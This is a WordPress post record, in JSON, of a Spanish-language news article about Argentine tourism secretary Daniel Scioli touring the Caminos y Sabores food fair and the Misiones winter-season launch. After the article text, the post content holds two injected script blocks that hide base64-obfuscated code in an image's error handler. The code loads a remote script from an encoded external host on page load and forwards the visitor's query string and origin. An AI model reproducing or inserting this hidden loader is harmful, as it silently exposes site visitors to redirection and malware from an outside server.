{"id":5312,"date":"2025-07-07T10:53:02","date_gmt":"2025-07-07T13:53:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5312"},"modified":"2025-08-13T23:27:38","modified_gmt":"2025-08-14T02:27:38","slug":"scioli-la-calidad-de-nuestra-gastronomia-es-una-carta-de-presentacion-a-nivel-nacional-e-internacional","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5312","title":{"rendered":"Scioli: \u00abLa calidad de nuestra gastronom\u00eda es una carta de presentaci\u00f3n a nivel nacional e internacional\u00bb"},"content":{"rendered":"\n<p><strong><em>As\u00ed lo afirm\u00f3 el funcionario nacional a su paso por la feria Caminos y Sabores, donde tambi\u00e9n particip\u00f3 en el lanzamiento de la oferta de actividades de Misiones para esta temporada y recorri\u00f3 los estands de todas las provincias.<\/em><\/strong><\/p>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes,&nbsp;<strong>Daniel Scioli<\/strong>, recorri\u00f3 la feria Caminos y Sabores, en la que participa el organismo a su cargo, y que re\u00fane a productores, emprendedores, chefs y amantes de la comida tradicional y regional. En ese marco, form\u00f3 parte del lanzamiento de la&nbsp;<strong>temporada de invierno<\/strong>&nbsp;2025 de&nbsp;<strong>Misiones<\/strong>.<\/p>\n\n\n\n<p>En el acto de lanzamiento misionero,&nbsp;<strong>Scioli<\/strong>&nbsp;felicit\u00f3 a los organizadores de la muestra por el \u00e9xito de la presente edici\u00f3n. Luego destac\u00f3 que&nbsp;<em>\u00ablas expresiones de la gastronom\u00eda y los productos de&nbsp;<strong>Misiones<\/strong>&nbsp;contribuyen a romper la estacionalidad, que si bien tiene como emblema a las&nbsp;<strong>Cataratas de Iguaz\u00fa<\/strong>, ofrece y recibe turismo de calidad en toda la provincia\u00bb<\/em>.<\/p>\n\n\n\n<p>El funcionario asimismo expres\u00f3:&nbsp;<em>\u00abLa calidad de nuestra gastronom\u00eda es una carta de presentaci\u00f3n a nivel nacional e internacional\u201d<\/em>.&nbsp;<em>\u201cEs la expresi\u00f3n del campo, la producci\u00f3n de alimentos, la mesa de los argentinos y los restaurantes que hacen posible que el nivel de la gastronom\u00eda sea uno de los grandes atractivos tur\u00edsticos\u201d<\/em>, sum\u00f3 y puntualiz\u00f3:&nbsp;<em>\u201cCada una de las expresiones que brindan las regiones de nuestro pa\u00eds generan impacto de valor\u00bb<\/em>.<\/p>\n\n\n\n<p>Tambi\u00e9n asegur\u00f3:&nbsp;<em>\u00abLos turistas vienen a buscar una experiencia de naturaleza, por lo que la tierra colorada, la selva y el agua misionera dan un mensaje fuerte para llamar su atenci\u00f3n\u00bb<\/em>.&nbsp;<em>\u00abFelicitaciones por hacer de la provincia de&nbsp;<strong>Misiones<\/strong>&nbsp;un epicentro de eventos deportivos, que al realizarse en escenarios naturales, promueven fuertemente al turismo\u00bb<\/em>, agreg\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/scioli_en_caminos_y_sabores_2025_3.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Por su parte, el ministro de Turismo de Misiones,&nbsp;<strong>Jos\u00e9 Mar\u00eda Arr\u00faa<\/strong>, se enfoc\u00f3 en destacar&nbsp;<em>\u201cel marco de la presentaci\u00f3n, la Feria Caminos y Sabores, una sinergia entre la gastronom\u00eda y turismo\u201d<\/em>. Adem\u00e1s, celebr\u00f3 que fuera una&nbsp;<em>\u201cpresentaci\u00f3n para las vacaciones de julio, organizada y planificada en sinton\u00eda con la segmentaci\u00f3n de cada provincia, que permite tener una regularidad en las visitas\u00bb<\/em>. Por \u00faltimo, expuso la agenda de actividades en la provincia durante el presente mes ideada para atraer a los visitantes.<\/p>\n\n\n\n<p>El secretario nacional tambi\u00e9n estuvo presente en el espacio que la Secretar\u00eda de Turismo, Ambiente y Deportes tiene en la feria, donde se dan a conocer las ofertas de los destinos tur\u00edsticos y se realizan degustaciones de platos, bebidas y otros productos. Vale destacar que el&nbsp;<strong>turismo enogastron\u00f3mico<\/strong>&nbsp;es un eje central de la gesti\u00f3n de cara a la promoci\u00f3n nacional e internacional de la Argentina.<\/p>\n\n\n\n<p>En esta edici\u00f3n, intervienen los cocineros&nbsp;<strong>Anita Ponce<\/strong>, de&nbsp;<strong>Jujuy<\/strong>, y&nbsp;<strong>Nahuel Sep\u00falveda<\/strong>, de&nbsp;<strong>Neuqu\u00e9n<\/strong>, quienes desde la cocina-escenario proponen un recorrido por los sabores del&nbsp;<strong>NOA<\/strong>&nbsp;y la&nbsp;<strong>Patagonia<\/strong>, utilizando materias primas representativas de sus provincias.<\/p>\n\n\n\n<p>Asimismo,&nbsp;<strong>Scioli<\/strong>&nbsp;pas\u00f3 por el estand de&nbsp;<strong>C\u00f3rdoba<\/strong>, donde mantuvo una reuni\u00f3n con&nbsp;<strong>Dario Capitani<\/strong>, presidente de Agencia C\u00f3rdoba Turismo, con quien convers\u00f3 sobre la organizaci\u00f3n de las V Jornadas Nacionales del Vino, a realizarse en esa provincia, entre el 8 y 9 de septiembre. Luego recorri\u00f3 los espacios de la feria de todas las provincias del pa\u00eds.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/scioli_en_caminos_y_sabores_2025_2.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La feria Caminos y Sabores, en su 19\u00aa edici\u00f3n, cuenta con el apoyo de la Secretar\u00eda y podr\u00e1 ser visitada hasta el 6 de julio en La Rural, de 12 a 20 h.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>As\u00ed lo afirm\u00f3 el funcionario nacional a su paso por la feria Caminos y Sabores, donde tambi\u00e9n particip\u00f3 en el lanzamiento de la oferta de actividades de Misiones para esta temporada y recorri\u00f3 los estands de todas las provincias. El secretario de Turismo, Ambiente y Deportes,&nbsp;Daniel Scioli, recorri\u00f3 la feria Caminos y Sabores, en la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5313,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-5312","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5312"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5312"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5312\/revisions"}],"predecessor-version":[{"id":6446,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5312\/revisions\/6446"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5313"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5312"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5312"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5312"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}